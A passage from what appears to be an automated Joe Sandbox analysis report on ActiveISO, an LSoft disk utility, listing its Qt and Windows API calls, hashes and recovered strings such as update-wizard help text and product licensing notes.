                                                                                                                    • Part of subcall function 00007FF65374CEF0: ?activate@QMetaObject@@SAXPEAVQObject@@PEBU1@HPEAPEAX@Z.QT5CORE ref: 00007FF65374CF1A
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E7DD
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E7E9
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E80D
                                                                                                                  • ?setButtonText@QWizard@@QEAAXW4WizardButton@1@AEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E81E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E82A
                                                                                                                    • Part of subcall function 00007FF65374EF00: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374EF26
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?setChar@@Object@@String@@@Text@$Char@@@Data@@Label@@ListLong@MetaWizardWizard@@$?activate@?arg@?begin@?end@?split@?tr@?wizard@Array@@Behavior@1@ButtonButton@1@ByteCaseLatin1List@@Page@@Qt@@@Sensitivity@SplitStringV0@@
                                                                                                                  • String ID: <b>Update is available!</b> Ready to download version <b>%1</b>$<b>Your version is the latest!</b> Software update is not available$Close
                                                                                                                  • API String ID: 4197598444-4205584852
                                                                                                                  • Opcode ID: 47c28b801ff3d59e49b270ce0c8f969350277d30a2117fba6f6012412eb4b37d
                                                                                                                  • Instruction ID: 862e3e6df39fda191013fe700cb75fb32f97421d25432f15c6eb281b66f0bda0
                                                                                                                  • Opcode Fuzzy Hash: 47c28b801ff3d59e49b270ce0c8f969350277d30a2117fba6f6012412eb4b37d
                                                                                                                  • Instruction Fuzzy Hash: 9F31C922E28A46D7E7009B75E8524796362FFC5FA0B441131EA5EB3AA4DF2CE404C748
                                                                                                                  APIs
                                                                                                                  • ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE ref: 00007FF6537421C7
                                                                                                                  • ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF6537421D1
                                                                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6537421E5
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537421F1
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65374220D
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374221C
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742243
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742256
                                                                                                                  • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF653742270
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374227C
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742288
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742294
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@$?fromArrayArray@@Ascii_helper@ByteData@Typed$?setString@@@Variant@@$?begin?data@Codec@Format@0@Group@Latin1@Object@@@Value@Variant@@@strncpy
                                                                                                                  • String ID: RegKey
                                                                                                                  • API String ID: 3423430134-1245383555
                                                                                                                  • Opcode ID: 6d75e422aca534605b8c652b26e2e931e3801164bffaa82fb2af4c6eaf943e1a
                                                                                                                  • Instruction ID: 2c22456d284d56a0e6ea4afd035888bd70bf6b6089421303a0e74cb706864914
                                                                                                                  • Opcode Fuzzy Hash: 6d75e422aca534605b8c652b26e2e931e3801164bffaa82fb2af4c6eaf943e1a
                                                                                                                  • Instruction Fuzzy Hash: AA214421E38A8692EA50DB60F8562AA7322FB85F11F841131E18EF66B4DF3CD508C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$File$?set?tr@Edit@@LineMetaObject@@String@@@Text@$?from?getArrayAscii_helper@Data@Dialog@@Dialog@@@@@Flags@Name@OpenOption@TypedV2@11Widget@@
                                                                                                                  • String ID: Add boot image$Boot images (*.img;*.bin;*.ima)
                                                                                                                  • API String ID: 674365227-335581910
                                                                                                                  • Opcode ID: d6f904962c56ec134d7a1fef309e449b4e9d79f6853787ef17f4e8bea84e0565
                                                                                                                  • Instruction ID: 3ed48589b70666c28a5384cf5025fd48c7f9e430078a0d9d308b86ec847810f9
                                                                                                                  • Opcode Fuzzy Hash: d6f904962c56ec134d7a1fef309e449b4e9d79f6853787ef17f4e8bea84e0565
                                                                                                                  • Instruction Fuzzy Hash: F6316172E28B47D2EB10CF60E8462A97762FB85B65F480131D24EB2974DF7CE549C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                  • Opcode ID: b338a39e15a3a72782727bd41cf77d17708b7557e7e24a992bede27d20c7790b
                                                                                                                  • Instruction ID: 5c443364d33646d17cacbc4160cddde4fd04481bba6fe78ca1b20640b5b014ee
                                                                                                                  • Opcode Fuzzy Hash: b338a39e15a3a72782727bd41cf77d17708b7557e7e24a992bede27d20c7790b
                                                                                                                  • Instruction Fuzzy Hash: FC213064E2DA0792FA559B64EC6B1B422A3EF44F40F5C4435C90EB66A1EE3CE445C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?fromString@@$ArrayAscii_helper@Data@Date@@String@String@@0@Typed
                                                                                                                  • String ID: dd-M-yyyy$dd-MM-yyyy$dd-MMM-yyyy
                                                                                                                  • API String ID: 3525257096-1397491054
                                                                                                                  • Opcode ID: 246fb43a58f60800bc3c35f0ce896716762cc2640535700c8f035d3899885be1
                                                                                                                  • Instruction ID: c49193b29ae6c5e9ed517ff36140872cf72f3059b5bfcd072f4f768486dc30f3
                                                                                                                  • Opcode Fuzzy Hash: 246fb43a58f60800bc3c35f0ce896716762cc2640535700c8f035d3899885be1
                                                                                                                  • Instruction Fuzzy Hash: F3213736A18F8192EB00CF91F8551A9B361FB84FA0F484231DA5EA7BA8DF7CD449C745
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • This help is likely not to be of any help., xrefs: 00007FF653749799
                                                                                                                  • This step provides download and installation of the latest software update, as well as rollback to the previously installed version.<br><br> The latest version download and installation starts automatically.<br><br>Rollback to the previously installed version , xrefs: 00007FF653749790
                                                                                                                  • Update Help, xrefs: 00007FF6537497DA
                                                                                                                  • This is a confirmation of successfull or unsuccessfull update.<br><br>In case if the software has been updated successfully, the latest version will be started after you close the application and launch it again.<br><br>In case if any errors occured while down, xrefs: 00007FF653749787
                                                                                                                  • This step provides options of downloading and installing the latest software, or rolling back recently installed update back to the previously installed version. <br><br>If a new release has been detected, you'll be notified and a new version displayed. Agree , xrefs: 00007FF6537497A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$MessageStandard$?current?information@Array@@Box@@Box@@@@Button@Button@1@ByteFlags@String@@1V0@$$V0@@W421@@Widget@@Wizard@@
                                                                                                                  • String ID: This help is likely not to be of any help.$This is a confirmation of successfull or unsuccessfull update.<br><br>In case if the software has been updated successfully, the latest version will be started after you close the application and launch it again.<br><br>In case if any errors occured while down$This step provides download and installation of the latest software update, as well as rollback to the previously installed version.<br><br> The latest version download and installation starts automatically.<br><br>Rollback to the previously installed version $This step provides options of downloading and installing the latest software, or rolling back recently installed update back to the previously installed version. <br><br>If a new release has been detected, you'll be notified and a new version displayed. Agree $Update Help
                                                                                                                  • API String ID: 1934070877-3966007248
                                                                                                                  • Opcode ID: dd8c067e34e951fa7fb927d72e56f800381ee91d61e55d7746678e9dc887bdb6
                                                                                                                  • Instruction ID: 96e73b5f6712f83874d9925de942229baf8efe5c9a880f8d8b37f4f0c9ffb30c
                                                                                                                  • Opcode Fuzzy Hash: dd8c067e34e951fa7fb927d72e56f800381ee91d61e55d7746678e9dc887bdb6
                                                                                                                  • Instruction Fuzzy Hash: 61219561E38A4291FA108F64E8435796323FF82F60F481231D06EF69E5DF2CE508C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Active@ Data Studio$DEMO$Evaluation version contains DEMO versions of LSoft products. $www.lsoft.net
                                                                                                                  • API String ID: 2577116290-1301159922
                                                                                                                  • Opcode ID: bed345df89d1991f2a71ef4d01a92fa7c9200a2b33c9f0e181c8a9c10d96e2ad
                                                                                                                  • Instruction ID: ff4c75fc4d95ba492ff7e5236ec65b447ae629eb0a5a12b8beee63cf462fc5e3
                                                                                                                  • Opcode Fuzzy Hash: bed345df89d1991f2a71ef4d01a92fa7c9200a2b33c9f0e181c8a9c10d96e2ad
                                                                                                                  • Instruction Fuzzy Hash: 61113361E28907E1FB108B64E8964B42332FF44FA8B8D1131D41EB69B4DF2CE149C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Active@ Boot Disk$DEMO$Evaluation version contains DEMO versions of all disk tools. $www.boot-disk.com
                                                                                                                  • API String ID: 2577116290-866144963
                                                                                                                  • Opcode ID: bb335ba618857eb605d8d00e0f31de4a965516e0669871944aa51376b44e6185
                                                                                                                  • Instruction ID: d7a644879212bdd21c14f97ab26871393e9adce529ac2eec3de84fce8dc3164a
                                                                                                                  • Opcode Fuzzy Hash: bb335ba618857eb605d8d00e0f31de4a965516e0669871944aa51376b44e6185
                                                                                                                  • Instruction Fuzzy Hash: EB113366E28907D1FB108B64E8964B42332FF44FA9B8D1131D41EB69B4DF2CE549C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Active@ Hard Disk Monitor$Freeware$Freeware version is a full-featured version for personal use. $www.disk-monitor.com
                                                                                                                  • API String ID: 2577116290-3531188487
                                                                                                                  • Opcode ID: 7b359b4b7d8c52c6977cb237b2613dbe3d300daf2fec15761937df2deff8167e
                                                                                                                  • Instruction ID: 2814f66feeaa8adfb4db34defed02310b708f8bb99b1b06be51143bd3b314117
                                                                                                                  • Opcode Fuzzy Hash: 7b359b4b7d8c52c6977cb237b2613dbe3d300daf2fec15761937df2deff8167e
                                                                                                                  • Instruction Fuzzy Hash: 1B113361E28907D1FB108B64E8964B42732FF44FA8B8D1131D41EB79A4DF2CE549C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Active@ ZDelete$Freeware$Freeware version supports the only One Pass Zeros erase method $www.zdelete.com
                                                                                                                  • API String ID: 2577116290-1000950470
                                                                                                                  • Opcode ID: 5c2e0a4bd23cfa3773d5480f3ed21fc6cf344d32be76a7908e043b09caaf39bd
                                                                                                                  • Instruction ID: 1cb0bf3870c2fadd3567517aebce29fc615dc3ed134708f452cef6a1d207c975
                                                                                                                  • Opcode Fuzzy Hash: 5c2e0a4bd23cfa3773d5480f3ed21fc6cf344d32be76a7908e043b09caaf39bd
                                                                                                                  • Instruction Fuzzy Hash: 59113061E28907E1FB108B64E8964B42372FF44FA9B8D1131E41EB69B4DF2CE549C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Active@ UNDELETE$DEMO$DEMO version recovers files maximum 64KB in size. $www.active-undelete.com
                                                                                                                  • API String ID: 2577116290-2681108828
                                                                                                                  • Opcode ID: 438ac1ae3dee310ddf9e2f315e6dff8ba9dd911ced6aeee90bcd3be7a963473f
                                                                                                                  • Instruction ID: 9e197efaaf7717dffed2ffcb2d260c309b0654108ceb526f5694fca50df5e706
                                                                                                                  • Opcode Fuzzy Hash: 438ac1ae3dee310ddf9e2f315e6dff8ba9dd911ced6aeee90bcd3be7a963473f
                                                                                                                  • Instruction Fuzzy Hash: 08113061E28907E1FB108B64E8D64B42732FF44FA8B8D1131D41EB69B4DF2CE149C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@V0@$$V0@@
                                                                                                                  • String ID: Active@ Partition Recovery$DEMO$DEMO version scans and detects damaged & deleted partitions. $www.partition-recovery.com
                                                                                                                  • API String ID: 2577116290-1279123436
                                                                                                                  • Opcode ID: 9d68a5c706653c51da23e3939abbaaa2762bfd2502f2b81df96653f294204d0d
                                                                                                                  • Instruction ID: 2c0d24b12a59f954bcc8e2769c89e70227e791d613d3d879e8f167713c4d3b49
                                                                                                                  • Opcode Fuzzy Hash: 9d68a5c706653c51da23e3939abbaaa2762bfd2502f2b81df96653f294204d0d
                                                                                                                  • Instruction Fuzzy Hash: 7F112E61E28A07E1EB108B64E8964B42722FF44FA8B8D1131D41EB69B4DF2CE149C788
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
